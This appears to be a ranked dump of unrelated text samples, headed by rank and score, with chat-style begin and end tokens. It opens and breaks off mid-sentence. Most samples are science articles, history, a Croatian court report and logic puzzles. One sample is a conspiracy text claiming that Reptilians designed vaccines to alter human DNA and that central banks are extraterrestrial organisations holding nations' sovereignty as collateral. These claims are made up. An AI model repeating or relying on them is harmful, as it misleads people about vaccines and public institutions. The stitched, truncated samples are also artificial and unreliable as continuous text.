animals. Used in an Li-O2 battery, Ryu explained, the molecule would dissolve into the battery's electrolytes and act as what's known as a redox mediator, which lowers the energy barrier required for the electrochemical reaction to take place. + +"When you breathe in air, the heme molecule absorbs oxygen from the air to your lungs and when you exhale, it transports carbon dioxide back out," Taylor said. "So it has a good binding with oxygen, and we saw this as a way to enhance these promising lithium-air batteries." + +The researchers added that their discovery could help reduce the amount of animal waste disposal. + +"We're using a biomolecule that traditionally is just wasted," said Taylor. "In the animal products industry, they have to figure out some way to dispose of the blood. Here, we can take the heme molecules from these waste products and use it for renewable energy storage." + +Ryu noted that by using recyclable biowaste as a +================================================================================ +Rank = 54; Score = 1335296.0 +<|begin_of_text|>July 2006 + +Introduction + +A whiff of pool water - often described as the smell of chlorine -can stir happy thoughts of summer. If strong enough, however, "pool smell" can signify a source of irritation to the eyes, lungs and skin of swimmers. + +Pool smell is due, not to chlorine, but to chloramines, chemical compounds that build up in pool water when it is improperly treated. + +Chloramines result from the combination of two ingredients: (a) chlorine disinfectants and (b) perspiration, oils and urine that enter pools on the bodies of swimmers. Chlorine disinfectants are added to pool water to destroy germs that can give swimmers diarrhea, ear aches and athlete's foot. Perspiration, oils and urine, however, are unwanted additions to pool water. By showering before entering the pool, and washing these substances from the skin, swimmers can help minimize pool smell. + +The Chemistry of Pool Smell + +When chlorine disinfectants are added to water, two chemicals are unleashed that destroy waterborne germs: hypochlorous acid, HOCl, and hypochlorite ion, OCl-. A measure of the chlorine in these two chemicals is known as "free available chlorine" or FAC. Pool operators manage the FAC level of pool water for the safety of swimmers. Their challenge comes from the fact that FAC is reduced when it reacts with perspiration, oils and urine from swimmers to form chloramines. + +Three hydrogen ions are found + +at the corners of the base of + +this pyramid-shaped molecule, + +with nitrogen at the top. + +One way that chloramines are formed in pool water is by the reaction of hypochlorous acid with ammonia. Ammonia, NH 3, is a component of sweat and urine. Its chemical structure is illustrated in the figure at the right. + +There are three chemical reactions that can occur when hypochlorous acid reacts with ammonia, each involving the replacement of hydrogen ions with chlorine ions. When one of ammonia's hydrogen ions is replaced with chlorine, monochloramine is formed: + +HOCl + NH 3 → NH 2 Cl + H 2 O + +Replacing one more hydrogen ion with chlorine produces dichloramine, + +HOCl + NH 2 Cl → NHCl 2 + H 2 O + +Finally, it is possible to replace all three of ammonia's hydrogen ions with chlorine to form trichloramine, also known as nitrogen trichloride: + +HOCl + NHCl +================================================================================ +Rank = 55; Score = 1327104.0 +<|begin_of_text|>Focus: A Detector to Track Antineutrinos + +A proposed detector for low-energy antineutrinos would reveal the particles’ trajectories, potentially allowing more detailed studies of Earth’s radioactivity and of nuclear reactors. + +B. R. Safdi and B. Suerfu, Phys. Rev. Lett. (2015) Slicing and dicing. In a proposed detector design, an antineutrino (green track) triggers inverse beta decay in a target layer, creating a neutron (yellow) and a positron (purple) that generate signals in adjacent capture layers. Connecting the dots makes it possible to deduce the antineutrino’s trajectory. Slicing and dicing. In a proposed detector design, an antineutrino (green track) triggers inverse beta decay in a target layer, creating a neutron (yellow) and a positron (purple) that generate signals in adjacent capture layers. Connecting the dots... Show more + +B. R. Safdi and B. Suerfu, Phys. Rev. Lett. (2015) Slicing and dicing. In a proposed detector design, an antineutrino (green track) triggers inverse beta decay in a target layer, creating a neutron (yellow) and a positron (purple) that generate signals in adjacent capture layers. Connecting the dots makes it possible to deduce the antineutrino’s trajectory. × + +Existing detectors for antineutrinos generated by nuclear reactors and by radioactive beta decay are large devices that record only the total number of particles they capture. Now two physicists propose an antineutrino detector that would record the direction in which captured particles were traveling. They hope to build a meter-sized demonstration device that could detect the intense flux of antineutrinos from a nuclear reactor, making it possible to image the reaction’s intensity. A detector able to map the much weaker emission from radioactivity within the Earth would be large but still potentially practical, they say. + +The standard method for detecting antineutrinos relies on inverse beta decay: the antineutrino collides with a proton (usually in hydrogen), converting it into a neutron and a positron that fly off at high speed. A typical detector is a large volume of a hydrogen-rich “scintillator” material, loaded with an element, such as boron, that has a propensity for capturing neutrons. The neutron produced by inverse beta decay initially moves roughly in line with the original path of the antineutrino, but it scatters from +================================================================================ +Rank = 56; Score = 1310720.0 +<|begin_of_text|>For the first time, astronomers have discovered complex organic molecules, the basic building blocks for life, in a disk of gas and dust surrounding an alien star. + +To the researchers' surprise, the organics found around a young star called MWC 480 are not only surviving but thriving in quantities slightly higher than those thought to have existed in the early solar system. The prolific amount of material reveals that Earth's solar system is not the only one to contain these complex molecules, suggesting that the ingredients required for life to evolve may exist throughout the universe. The scientists created a video tour of the star MWC 48 to showcase their discovery + +An artist's impression of the protoplanetary disk surrounding the young star MWC 480, where the giant ALMA radio telescope has detected complex organic molecules – the building blocks of life – suggesting that the conditions necessary for life are universal. (Image: © B. Saxton (NRAO/AUI/NSF)) + +"The very rich organic chemistry present in the young solar system, as evidenced by cometary compositions, is far from unique," lead author Karin Öberg, of the Harvard-Smithsonian Center for Astrophysics in Massachusetts, told Space.com by email. + +"It thus seems likely that the prebiotic chemistry that took place in the solar system, including Earth, is also happening elsewhere," she said. [Related: Signs of Alien Life Will Be Found by 2025, NASA's Chief Scientist Says] + +Building blocks abound + +Located in the Taurus star-forming region 455 light-years away from Earth, the star MWC 480 is about twice the mass of the sun and shines nearly 10 times brighter. A disk of material surrounds the million-year-old star, but scientists have not observed any obvious signs of planet formation. + +Using the Atacama Large Millimeter/submillimeter Array (ALMA), Öberg and her colleagues observed MWC 480, finding enough methyl cyanide (a complex carbon-based molecule) in the disk surrounding the star to fill all of Earth's oceans. They also found a supply of other complex carbon-based molecules. + +Volatile elements such as cyanides boil away at high temperatures. Despite this fragility, they are thought to be necessary for life. The carbon-nitrogen bonds of cyanides are especially important, as they are essential to the formation of amino acids, which in turn are the building blocks for proteins. + +While astronomers have found simple volatilesin disks around other stars, complex organic molecules such as those spotted by the team have remained more +================================================================================ +Rank = 57; Score = 1302528.0 +<|begin_of_text|>Today’s post looks at an aspect of chemistry we come across every day: alloys. Alloys make up parts of buildings, transport, coins, and plenty of other objects in our daily lives. But what are the different alloys we use made up of, and why do we use them instead of elemental metals? The graphic answers the first of these questions, and in the post we’ll try and answer the second. + +First, a little on what alloys are, for anyone unfamiliar with the term. Alloys are a mixture of elements, where at least one of the elements is a metal. There are over 80 metals in the periodic table of elements, and we can mix selections of these different metals in varying proportions, sometimes with non-metals too, to create alloys. Note the use of the word mixture: in the vast majority of cases, alloys are simply intermixed elements, rather than elements that are chemically bonded together. + +Alloys can be simply classified in terms of their atomic arrangements. In cases where the two elements being mixed to make the alloy have similar atom sizes, atoms of the second element can simply take the place of atoms of the first element in the structure. These types of alloys are called substitution alloys. On the other hand, if the atoms of the second element are much smaller, they can slot into the gaps between atoms of the first element. These alloys are known as interstitial alloys. Alloys can be made in a number of ways, but they are primarily fashioned by mixing together the molten components. + +There are a great range of alloys; the main graphic illustrates just a small selection of those that we use in a range of applications. But why use them in the first place when there are so many different metals with varying properties in the periodic table? Whilst metallic elements may have desirable properties, unfortunately they rarely have them in convenient combinations. Gold is shiny and, well, golden, but it’s also quite soft, meaning if you try and make a ring from pure gold, it’ll deform easily. Iron is present in many buildings, but on its own it too is a little on the soft side, and also has a tendency to rust when exposed to damp air. + +Making alloys is essentially a way for us to ‘tweak’ the properties of a metal, to make them closer to the ideal properties we want for a particular purpose. Alloying gold with copper or silver makes it harder, whilst alloying iron with carbon and a selection of other metals accomplishes a similar effect, and also helps prevent it +================================================================================ +Rank = 58; Score = 1294336.0 +<|begin_of_text|>mæsse,'mass', and it may have been a day when + +mæsse + +Harvest, from an Anglo-Saxon calendar for August (BL Cotton MS Tiberius B V/1, f. 6v) + +[...] lange sticcan feðerecgede 7 writ on ægðerne sticcan[...] ælcere ecge an pater noster oð ende 7 lege þone [...]an þam berene on þa flore 7 þone oðerne on [...] ofer þam oðrum sticcan. þæt þær si rode tacen on 7 nim of ðam gehalgedan hlafe þe man halgie on hlafmæssedæg feower snæda 7 gecryme on þa feower hyrna þæs berenes. þis is þeo bletsung þærto. Vt surices garbas non noceant has preces super garbas dicis et non dicto eos suspendis hierosolimam ciuitate. ubi surices nec habitent nec habent potestam. nec grana colligent. nec triticum congaudent. þis is seo oðer bletsung. Domine deus omnipotens qui fecisti celum et terram. tu benedicis fructum istum in nomine patris et spiritus sancti. amen. 7 Pater noster. + +[Take two] long pieces of four-edged wood, and on each piece write a Pater noster, on each side down to the end. Lay one on the floor of the barn, and lay the other across it, so that they form the sign of the cross. And take four pieces of the hallowed bread which is blessed on Lammas day, and crumble them at the four corners of the barn. This is the blessing for that; so that mice do not harm these sheaves, say prayers over the sheaves and do not cease from saying them. 'City of Jerusalem, where mice do not live they cannot have power, and cannot gather the grain, nor rejoice with the harvest.' This is the second blessing: 'Lord God Almighty, who made heaven and earth, bless these fruits in the name of the Father and the Holy Spirit.' Amen. And [then say] a Pater Noster. + +Quoted from Karen Louise Jolly, +================================================================================ +Rank = 59; Score = 1269760.0 +<|begin_of_text|>[/caption] + +A new look at data from the Mars Viking landers concludes that the two landers may have found the building blocks of life on the Red Planet after all way back in 1976. The surprise discovery of perchlorates by the Phoenix mission on Mars 32 years later could mean the way the Viking experiment was set up actually would have destroyed any carbon-based chemical building blocks of life – what the experiment set about to try and find. + +“This doesn’t say anything about the question of whether or not life has existed on Mars, but it could make a big difference in how we look for evidence to answer that question,” said Chris McKay of NASA’s Ames Research Center. McKay coauthored a study published online by the Journal of Geophysical Research – Planets, reanalyzing results of Viking’s tests for organic chemicals in Martian soil. + +The Viking lander scooped up some soil, put it in a tiny oven and heated the sample. The only organic chemicals identified in the Martian soil from that experiment chloromethane and dichloromethane — chlorine compounds interpreted at the time as likely contaminants from cleaning fluids used on the spacecraft before it left Earth. But those chemicals are exactly what the new study found when a little perchlorate — the surprise finding from Phoenix — was added to desert soil from Chile containing organics and analyzed in the manner of the Viking tests. + +“Our results suggest that not only organics, but also perchlorate, may have been present in the soil at both Viking landing sites,” said the study’s lead author, Rafael Navarro-González of the National Autonomous University of Mexico, Mexico City. + +The Viking experiment results have been rather controversial over the years. There are some scientists who say the experiment actually did find evidence for life, and others who say the results were inconclusive. + +McKay said that organics can come from non-biological or biological sources. Many meteorites raining onto Mars and Earth for the past 5 billion years contain organics. Even if Mars has never had life, scientists before Viking anticipated that Martian soil would contain organics from meteorites. + +“The lack of organics was a big surprise from the Vikings,” McKay said. “But for 30 years we were looking at a jigsaw puzzle with a piece missing. Phoenix has provided the missing piece: perchlorate. The perchlorate discovery by Phoenix was one of the most important results from Mars since Viking.” Perchlorate, an ion of chlorine and oxygen, becomes a strong oxidant when heated. “ +================================================================================ +Rank = 60; Score = 1261568.0 +<|begin_of_text|>The first experimental evidence showing how atmospheric nitrogen can be incorporated into organic macromolecules is being reported by a University of Arizona team. + +The finding indicates what organic molecules might be found on Titan, the moon of Saturn that scientists think is a model for the chemistry of pre-life Earth. + +Earth and Titan are the only known planetary-sized bodies that have thick, predominantly nitrogen atmospheres, said Hiroshi Imanaka, who conducted the research while a member of UA's chemistry and biochemistry department. + +How complex organic molecules become nitrogenated in settings like early Earth or Titan's atmosphere is a big mystery, Imanaka said. + +"Titan is so interesting because its nitrogen-dominated atmosphere and organic chemistry might give us a clue to the origin of life on our Earth," said Imanaka, now an assistant research scientist in the UA's Lunar and Planetary Laboratory. "Nitrogen is an essential element of life." + +However, not just any nitrogen will do. Nitrogen gas must be converted to a more chemically active form of nitrogen that can drive the reactions that form the basis of biological systems. + +Imanaka and Mark Smith converted a nitrogen-methane gas mixture similar to Titan's atmosphere into a collection of nitrogen-containing organic molecules by irradiating the gas with high-energy UV rays. The laboratory set-up was designed to mimic how solar radiation affects Titan's atmosphere. + +Most of the nitrogen moved directly into solid compounds, rather than gaseous ones, said Smith, a UA professor and head of chemistry and biochemistry. Previous models predicted the nitrogen would move from gaseous compounds to solid ones in a lengthier stepwise process. + +Titan looks orange in color because a smog of organic molecules envelops the planet. The particles in the smog will eventually settle down to the surface and may be exposed to conditions that could create life, said Imanaka, who is also a principal investigator at the SETI Institute in Mountain View, Calif. + +However, scientists don't know whether Titan's smog particles contain nitrogen. If some of the particles are the same nitrogen-containing organic molecules the UA team created in the laboratory, conditions conducive to life are more likely, Smith said. + +Laboratory observations such as these indicate what the next space missions should look for and what instruments should be developed to help in the search, Smith said. + +Imanaka and Smith's paper, "Formation of nitrogenated organic aerosols in the Titan upper atmosphere," is scheduled for publication in the Early Online edition of the Proceedings of the National Academy of Sciences the week of June 28 +================================================================================ +Rank = 61; Score = 1245184.0 +<|begin_of_text|>Izvor: Ivo Cagalj/PIXSELL + +Zbog ratnog zločina nad hrvatskim vojnicima i civilima Dragan Vasiljković, poznatiji kao kapetan Dragan, danas je na splitskom Županijskom sudu, nakon godinu dana suđenja, nepravomoćno osuđen na 15 godina zatvora. + +Vasiljković je optužen da je kao zapovjednik Jedinice za posebne namjene u sastavu paravojnih srpskih postrojbi, odnosno zapovjednik Nastavnog centra za obuku pripadnika specijalnih postrojbi Alfa, postupao protivno odredbama Ženevske konvencije. Na teret mu se stavljalo i da je tijekom lipnja i srpnja 1991. u zatvoru na kninskoj tvrđavi te tijekom veljače 1993. u Bruškoj kod Benkovca mučio, zlostavljao i usmrćivao zarobljene pripadnike hrvatske vojske i policije. + +Uz to je optužen i da je tijekom srpnja 1991. u Glini, u dogovoru sa zapovjednikom tenkovske jedinice JNA, izradio plan napada na tamošnju policijsku postaju te prigradsko naselje Jukinac, sela Gornji i Donji Viduševac, a potom i njihovo zauzimanje. Tijekom napada su oštećeni i uništeni civilni objekti, stanovništvo natjerano na bijeg, opljačkana je imovina, a ubijeni su i ranjeni civili od kojih i jedan strani novinar. + +Vasiljković je od prvog dana suđenja, 20. rujna prošle godine pa sve do završnih riječi krajem prošlog tjedna, negirao počinjenje kaznenih djela koja mu se +================================================================================ +Rank = 62; Score = 1236992.0 +<|begin_of_text|>Exercise provides many health benefits, including improved metabolism, cardiovascular health, and cognition. We have shown previously that FNDC5, a type I transmembrane protein, and its circulating form, irisin, convey some of these benefits in mice. However, recent reports questioned the existence of circulating human irisin both because human FNDC5 has a non-canonical ATA translation start and because of claims that many human irisin antibodies used in commercial ELISA kits lack required specificity. In this paper we have identified and quantitated human irisin in plasma using mass spectrometry with control peptides enriched with heavy stable isotopes as internal standards. This precise state-of-the-art method shows that human irisin is mainly translated from its non-canonical start codon and circulates at ∼3.6 ng/ml in sedentary individuals; this level is increased to ∼4.3 ng/ml in individuals undergoing aerobic interval training. These data unequivocally demonstrate that human irisin exists, circulates, and is regulated by exercise. + +Human FNDC5 has an atypical translation start codon, ATA, in place of the more typical ATG. While it is now known that many eukaryotic mRNAs begin translation with non-ATG start codons (), two recent papers have claimed that this ATA codon in human FNDC5 represents a null mutation and therefore human irisin would not be produced (). These authors argue that if FNDC5 exists in humans, it is translated from a downstream ATG, and hence the irisin polypeptide is a “myth” and does not exist. In addition, these authors claim that the many papers measuring human irisin are all artifacts of poor antibody specificity (); this is despite the fact that Lee et al. had previously detected an irisin peptide in human plasma with mass spectrometry (). In this paper we have investigated the presence of human irisin in blood using quantitative mass spectrometry. As internal standards, we synthesized irisin peptides and included a valine enriched in stable isotopes (sixC atoms). The peptides were used to develop a quantitative platform for the measurement of human irisin; these data should facilitate future studies of this molecule in both mice and humans. + +The health benefits of physical activity and exercise are well recognized (). Exercise is the first line of therapy for various metabolic diseases like diabetes and obesity, but exercise also improves outcomes in diseases involving other tissues, such as the heart and brain. We recently described a novel polypeptide that is secreted from skeletal muscle +================================================================================ +Rank = 63; Score = 1228800.0 +<|begin_of_text|>Whether its a new drug, a new fertilizer or a new solar panel, chemists have been stuck using the same methods to make their inventions. Now, the Center for Selective C-H Functionalization, run by Emory University organic chemist Huw Davies, is breaking the mold. + +“It is an entirely different way of putting molecules together,” Davies said. “And that means it allows you ready access to compounds that have either never been made before, or that were impractical to be made by the conventional methods.” + +This international collaboration of scientists is redesigning how organic chemicals are made. Every organic chemical has a basic framework made up of carbon and hydrogen. When chemists make new drugs, for example, they build on those existing frameworks. + +But what if you could break open that framework? You could build new chemical structures into the framework, Davies said, opening up new possibilities for drugs and other organic chemicals. + +It will also make some chemicals cleaner and cheaper to make, said Daniel Morton, managing director of the Center for Selective C-H Functionalization. By changing how chemicals are made, scientists can eliminate toxic byproducts and waste. + +“I think in every field of science one of the biggest drives in the last 20 years has been how to do things in a cleaner, more effective and efficient fashion,” he said. “And that’s what this center is all about.” + +Miles O’Brien has more on this story for the National Science Foundation series “Science Nation.”* + +*For the record, the National Science Foundation is also an underwriter of the NewsHour.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 64; Score = 1204224.0 +<|begin_of_text|>Experiment Summary Scientific Questions How much of the ionosphere is affected by a solar eclipse? + +For how long is the ionosphere affected by a solar eclipse? + +What causes these spatial and temporal scales? Methodology Illuminate the ionosphere with an Eclipse QSO Party. + +Use networks such as the Reverse Beacon Network to collect data. + +Use amateur radio data to complement data from other sources. + +Introduction + +On 21 August 2017, a total solar eclipse will cause the shadow of the moon to traverse the United States from Oregon to South Carolina in just over 90 minutes. As shown in Figure 1, this will be the one of most significant solar eclipses traversing the continental United States for 100 years. While solar eclipses are perhaps best known for their stunning visual display, the shadow of an eclipse also causes changes to the ionosphere which effect radio wave propagation and are useful for the study of ionospheric physics. For a summary of ionspheric radio effects as measured during the 1999 United Kingdom Total Solar Eclipse, please see Bamford 2000. + +Although the ionospheric effects of solar eclipses have been studied for over 50 years, many unanswered questions remain. Some include, “How much of the ionosphere is affected by the solar eclipse, and for how long? Why is this the case?” HamSCI is inviting amateur radio operators to participate in a large-scale experiment which will characterize the ionospheric response to the 21 August 2017 total solar eclipse and target these open questions in ionospheric physics. + +Figure 1: Total solar eclipses visible in the US from 1950 to 2052. The 2017 eclipse (red triangles) will have an exceptionally long footprint in the heart of the continental US. + +Background + +The ionosphere is produced when solar ultra violet (UV) and x-ray radiation cause neutral atoms and molecules in the Earth’s atmosphere to be stripped of negative electrons. This creates a type of gas known as a plasma, which is made of both positively and negatively charged particles. After a certain amount of time, some of these particles recombine to form neutrals again. When solar radiation is present, ionospheric production and loss processes occur simultaneously creating a strong ionosphere. When solar radiation is absent, loss processes dominate and the ionosphere becomes weaker. These effects are most commonly observed as a result of the day-night (diurnal) cycle. Figure 2 shows examples of typical day and night ionospheric profiles generated using the International Reference Ionosphere (IRI) empirical +================================================================================ +Rank = 65; Score = 1204224.0 +<|begin_of_text|>Wootz steel is a crucible steel characterized by a pattern of bands. These bands are formed by sheets of microscopic carbides within a tempered martensite or pearlite matrix in higher carbon steel, or by ferrite and pearlite banding in lower carbon steels. It was a pioneering steel alloy developed in Southern India in the 6th century BC and exported globally. It was also known in the ancient world by many different names including Ukku, Hindvi Steel, Hinduwani Steel, Teling Steel and Seric Iron. + +History [ edit ] + +Wootz steel originated in South India, in Tamilakam present day Tamil Nadu and Kerala.[1][2] There are several ancient Tamil, Greek, Chinese and Roman literary references to high carbon Tamil steel. The crucible steel production process started in the 6th century BC, at production sites of Kodumanal in Tamil Nadu, Golconda in Telangana, Karnataka and Sri Lanka and exported globally; the Tamils of the Chera Dynasty producing what was termed the finest steel in the world, i.e. Seric Iron to the Romans, Egyptians, Chinese and Arabs by 500 BC.[3][4][5] The steel was exported as cakes of steely iron that came to be known as "Wootz".[6] Wootz steel in India had high amount of carbon in it. + +The Tamilakam method was to heat black magnetite ore in the presence of carbon in a sealed clay crucible inside a charcoal furnace to completely remove slag. An alternative was to smelt the ore first to give wrought iron, then heat and hammer it to remove slag. The carbon source was bamboo and leaves from plants such as Avārai.[6][7] The Chinese and locals in Sri Lanka adopted the production methods of creating wootz steel from the Chera Tamils by the 5th century BC.[8][9] In Sri Lanka, this early steel-making method employed a unique wind furnace, driven by the monsoon winds. Production sites from antiquity have emerged, in places such as Anuradhapura, Tissamaharama and Samanalawewa, as well as imported artifacts of ancient iron and steel from Kodumanal. A 200 BC Tamil trade guild in Tissamaharama, in the South East of Sri Lanka, brought with them some of the oldest iron and steel artifacts and production processes to the island from the classical period.[10][11][12][13] + + +================================================================================ +Rank = 66; Score = 1187840.0 +<|begin_of_text|>"Gly" redirects here. For the unit of measurement, see light-year + +Glycine (symbol Gly or G;[4] )[5] is the amino acid that has a single hydrogen atom as its side chain. It is the simplest possible amino acid. The chemical formula of glycine is NH 2 ‐CH 2 ‐COOH. Glycine is one of the proteinogenic amino acids, and is notable as the only one that is achiral. It is encoded by all the codons starting with GG (GGU, GGC, GGA, GGG). Glycine is also known as a "helix breaker". + +Glycine is a colorless, sweet-tasting crystalline solid. It is the only achiral proteinogenic amino acid. It can fit into hydrophilic or hydrophobic environments, due to its minimal side chain of only one hydrogen atom. The acyl radical is glycyl. + +Glycine is a white crystalline solid + +History and etymology [ edit ] + +Glycine was discovered in 1820 by the French chemist Henri Braconnot when he hydrolyzed gelatin by boiling it with sulfuric acid.[6] He originally called it "sugar of gelatin",[7][8] but the French chemist Jean-Baptiste Boussingault showed that it contained nitrogen.[9] The American scientist Eben Norton Horsford, then a student of the German chemist Justus von Liebig, proposed the name "glycocoll";[10][11] however, the Swedish chemist Berzelius suggested the simpler name "glycine".[12][13] The name comes from the Greek word γλυκύς "sweet tasting"[14] (which is also related to the prefixes glyco- and gluco-, as in glycoprotein and glucose). In 1858, the French chemist Auguste Cahours determined that glycine was an amine of acetic acid.[15] + +Production [ edit ] + +Although glycine can be isolated from hydrolyzed protein, this is not used for industrial production, as it can be manufactured more conveniently by chemical synthesis.[16] The two main processes are amination of chloroacetic acid with ammonia, giving glycine and ammonium chloride,[17] and the Strecker amino acid synthesis,[18] which is the main synthetic method in the United States and Japan.[19] About 15 thousand tonnes are produced annually in this +================================================================================ +Rank = 67; Score = 1187840.0 +<|begin_of_text|>1. The Camels Four tasmanian camels traveling on a very narrow ledge encounter four tasmanian camels coming the other way. As everyone knows, tasmanian camels never go backwards, especially when on a precarious ledge. The camels will climb over each other, but only if there is a camel sized space on the other side. The camels didn't see each other until there was only exactly one camel's width between the two groups. How can all camels pass, allowing both groups to go on their way, without any camel reversing? Show Hint Show Solution Hint: Use match sticks or coins to simulate the puzzle. Solution: First a camel from one side moves forward, then two camels from the other side move forward, then three camels from the first side move forward etc... + +etc... + +2. The Waiter Three men in a cafe order a meal the total cost of which is $15. They each contribute $5. The waiter takes the money to the chef who recognizes the three as friends and asks the waiter to return $5 to the men. The waiter is not only poor at mathematics but dishonest and instead of going to the trouble of splitting the $5 between the three he simply gives them $1 each and pockets the remaining $2 for himself. Now, each of the men effectively paid $4, the total paid is therefore $12. Add the $2 in the waiters pocket and this comes to $14.....where has the other $1 gone from the original $15? Show Solution Solution: The payments should equal the receipts. It does not make sense to add what was paid by the men ($12) to what was received from that payment by the waiter ($2) Although the initial bill was $15 dollars, one of the five dollar notes gets changed into five ones. The total the three men ultimately paid is $12, as they get three ones back. So from the $12 the men paid, the owner receives $10 and the waiter receives the $2 difference. $15 - $3 = $10 + $2. + +3. The Boxes There are three boxes. One is labeled "APPLES" another is labeled "ORANGES". The last one is labeled "APPLES AND ORANGES". You know that each is labeled incorrectly. You may ask me to pick one fruit from one box which you choose. How can you label the boxes correctly? Show Solution Solution: Pick from the one labeled "Apples & Oranges". This box must contain either +================================================================================ +Rank = 68; Score = 1163264.0 +<|begin_of_text|>The New World Disorder is a Reptilian Disorder designed to destroy what ENKI has created from the Appa Beast with the Divine Anunnaki Mothers and with the Clay of the Earth. + +The Reptiles call Humanity Beasts because you comprise of Carbon Atoms,6 Neutrons, 6 Electrons, 6 Protons, 666, the Atomic structure of the Beast, the Adamu,a Carbon Based Life Form. + +A Worker & Builder Group of the Creator. + +You are Marvalous Builders and Highly Creative. + +Humans are Carbon Based Lifeforms, while the Reptilians are Copper based. + +Sure Reptilians are stronger and live longer than Humans but they too are far from perfect, they have shortfalls, they lack Empathy, they lack compassion, they lack Passion, they lack Free will because they are slaves to their own hierarchy, they lack Love and are very heartless Beings and only know Domination and percieve Compassion as a Weakness and a Joke. + +They will never evolve to Higher Levels of Existence because they do not have what the Falcon Masters have, the Gift of the Akhu (The Divine Feather). + +Humanity on the other hand has been designed to be Unlimited in their Potential, Yes Unlimited, created by the Ultimate GENESIS Sciences of the Heavens. + +The Reptilian Vaccines will never alter the DNA of Adamu, the Reptilian Mind Control will never overcome DESTINY. + +Hear these words for these words are Eternal, Eternal. + +The CENTRAL BANKING SYSTEM is a REPTILIAN SYSTEM, The Dredds ( Jamaica ) call it the Babylon System, Correct it is an Ancient System, a System not only being used here on Earth but on other Planets in other Star Systems. + +The CENTRAL BANKING SYSTEM is EXTRATERRESTRIAL and it is a PRIVATE ORGANIZATION that Holds Governments & Kings to Account. + +The CENTRAL BANKS fund Wars, they fund Heroes & Enemies alike, yes they Fund$$$ both sides. + +No Nation can go to WAR without Funding$$$ from these CENTRAL BANKS. + +Governments that over extend their Budgets because of reckless Spending $$$, can Increase TAXES from the Beast, but when they are Bankrupt they will go to the CENTRAL BANKS for LOANS and to SECURE these LOANS with the EXTRATERRESTRIALS they hold the Nations Sovereignty and the Lives of all Humans / Adamu as collateral which is Treason. + +Humans must hold their respective Governments to Account for +================================================================================ +Rank = 69; Score = 1138688.0 +<|begin_of_text|>It's Elemental + +The Element Helium + +[Click for Isotope Data] + +2 He Helium 4.002602 Atomic Number: 2 Atomic Weight: 4.002602 Melting Point: 0.95 K (-272.2°C or -458.0°F) Boiling Point: 4.22 K (-268.93°C or -452.07°F) Density: 0.0001785 grams per cubic centimeter Phase at Room Temperature: Gas Element Classification: Non-metal Period Number: 1 Group Number: 18 Group Name: Noble Gas + +What's in a name? For the Greek god of the sun, Helios. + +Say what? Helium is pronounced as HEE-lee-em. + +History and Uses: + +Helium, the second most abundant element in the universe, was discovered on the sun before it was found on the earth. Pierre-Jules-César Janssen, a French astronomer, noticed a yellow line in the sun's spectrum while studying a total solar eclipse in 1868. Sir Norman Lockyer, an English astronomer, realized that this line, with a wavelength of 587.49 nanometers, could not be produced by any element known at the time. It was hypothesized that a new element on the sun was responsible for this mysterious yellow emission. This unknown element was named helium by Lockyer. + +The hunt to find helium on earth ended in 1895. Sir William Ramsay, a Scottish chemist, conducted an experiment with a mineral containing uranium called clevite. He exposed the clevite to mineral acids and collected the gases that were produced. He then sent a sample of these gases to two scientists, Lockyer and Sir William Crookes, who were able to identify the helium within it. Two Swedish chemists, Nils Langlet and Per Theodor Cleve, independently found helium in clevite at about the same time as Ramsay. + +Helium makes up about 0.0005% of the earth's atmosphere. This trace amount of helium is not gravitationally bound to the earth and is constantly lost to space. The earth's atmospheric helium is replaced by the decay of radioactive elements in the earth's crust. Alpha decay, one type of radioactive decay, produces particles called alpha particles. An alpha particle can become a helium atom once it captures two electrons from its 